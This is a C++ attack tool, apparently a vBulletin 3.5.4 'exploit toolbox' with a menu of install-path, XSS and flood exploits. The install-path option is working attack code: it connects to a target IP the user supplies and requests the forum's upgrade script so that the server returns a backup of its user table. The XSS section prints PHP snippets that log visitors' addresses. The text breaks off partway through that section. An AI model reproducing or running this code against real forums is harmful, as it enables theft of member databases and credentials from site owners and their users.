vbulletin Exploit Tool Box

#include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/inet.h> #include <errno.h> #include <string.h> #include <iostream> using namespace std; string exploit; string answer; string answer2; long s; sockaddr_in addr; char IPaddr[1024]; /*You have to change to the right path*/ char sget[] = "GET /install/upgrade_300b3.php?step=backup&do=sqltable&table=user HTTP/1.0\r\nConnection: Close\r\n\r\n"; char stry[41943040]; long I; long M, J, K, L; int i; int main() { cout << "> Welcome to vbulletin 3.5.4 Exploit-Toolbox v.0.1.1" << endl; cout << "> Here you can find all released vbullein 3.5.4 exploits" << endl; cout << "> Press 1 for Install_path exploit" << endl; cout << "> Press 2 for Xss vbulletin 3.5.x (test: 3.5.4)" << endl; cout << "> Press 3 for vBulletin 3.5.4 Flood Exploit" << endl; cout << "> Programm Author M4k3, www.pldsoft.com" << endl; cout << "> Copyright by PLDsoft.com" << endl; cout << "> Number? "; cin >> exploit; cout << endl; if (exploit == "1") { cout << " ____________________ " << endl; cout << " |---PLDsoft.com------|" << endl; cout << " |--------------------|" << endl; cout << " |-vbulletin 3.5.4---|" << endl; cout << " |install_path exploit|" << endl; cout << " |____________________|" << endl; cout << "##############################################" << endl; cout << "vBulltin 3.5.4 exploit.....install path is open or not secure" << endl; cout << "###############################################" << endl; cout << endl; cout << "Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com" << endl; cout << "Remote : Yes" << endl; cout << "Critical Level : Dangerous"<< endl; cout << "############################################" << endl; cout << "Affected software description :" << endl; cout << endl; cout << "Application : vbulletin" << endl; cout << "version : latest version [ 3.60 Release 4 ]" << endl; cout << "URL : http://www.vbulletin.com" << endl; cout << endl; cout << "########################################" << endl; cout << "Exploit:" << endl; cout << endl; cout << "www.vicitimsite.com/forumpath/install/upgrade.php?step=[writehereanylettersbutnotnumbers!]" << endl; cout << endl; cout << "when it works, you can download the database..." << endl; cout << endl; cout << "########################################" << endl; cout << "Contact:" << endl; cout << "Nick: M4k3" << endl; cout << "E-mail: m4k3@pldsoft.com" << endl; cout << "Website: http://www.pldsoft.com" << endl; cout << "_______End of Exploit______" << endl; cout << endl; sleep(1); cout << "Use the exploit now?" << endl; cout << "yes/no: "; cin >> answer; } if (answer == "yes") { cout << "Starting vbulletin 3.5.4 install_path exploit" << endl; { cout << "Insert IP: "; cin >> IPaddr; M = 0; J = 0; K = 0; L = 0; while(IPaddr[i] != 0) { if(IPaddr[i] >= '0' && IPaddr[i] <= '9') { L *= 10; L += IPaddr[i] - '0'; K++; if(K > 3) { M = -1; break; } } else if(IPaddr[i] == '.') { if(K == 0) { M = -1; break; } if(L >= 255) { M = -1; break; } J++; K = 0; L = 0; } else { M = -1; break; } M++; } if(M == -1 || J != 3) { cout << "> Invalid IP-Address!" << endl; return 0; } s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); addr.sin_family = AF_INET; inet_aton(IPaddr, &addr.sin_addr); addr.sin_port = htons(80); if(connect(s, (sockaddr*) &addr, sizeof(sockaddr_in))) { printf("Failure: Connection Rested!\r\n"); close(s); return 1; } if(send(s, sget, strlen(sget), 0) == 0) { printf("Failure: Not able to send packets!\r\n"); close(s); return 2; } if((I = recv(s, stry, 41943040, 0)) == 0) { printf("Failure: Not able to receive packets!\r\n"); close(s); return 3; return 0; } close(s); printf("Packets received succesfully!\r\nBytes of received Data: %d\r\n", I); printf("%s", stry); return 0; } } else if (exploit == "2") { cout << "=> Xss Vbulletin 3.5.x ( test: 3.5.4 )"<< endl; cout << "=> Author: SpiderZ"<< endl; cout << "=> Sito: www.spiderz.tk"<< endl; cout << endl; cout << "_____________________________________________________________"<< endl; cout << endl; cout << "( 1 )"<< endl; cout << endl; cout << "<?php"<< endl; cout << "$ip_adresse = $_SERVER['REMOTE_ADDR']; "<< endl; cout << "if(!empty($ip_adresse)) "<< endl; cout << "{ "<< endl; cout << "echo 'il tuo ip ?: ',$ip_adresse; "<< endl; cout << "} "<< endl; cout << "else "<< endl; cout << "{ "<< endl; cout << "echo 'Impossible d\'afficher l\'IP'; "<< endl; cout << "} "<< endl; cout << "?> "<< endl; cout << endl; cout << "<a href=""log.php""></a><?"<< endl; cout << "$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];"<< endl; cout << "$day = date(""d"",time()); $month = date(""m"",time()); $year = date(""Y"",time());"<< endl; cout << "if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;"<< endl; cout << "else $visitor_info = $REMOTE_HOST;"<< endl; cout << "$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;"<< endl; cout << "$x1=`host $REMOTE_ADDR|grep Name`;"<< endl; cout << "$x2=$REMOTE_PORT;"<< endl; cout << "?>"<< endl; cout << endl; cout << "<?php"<< endl;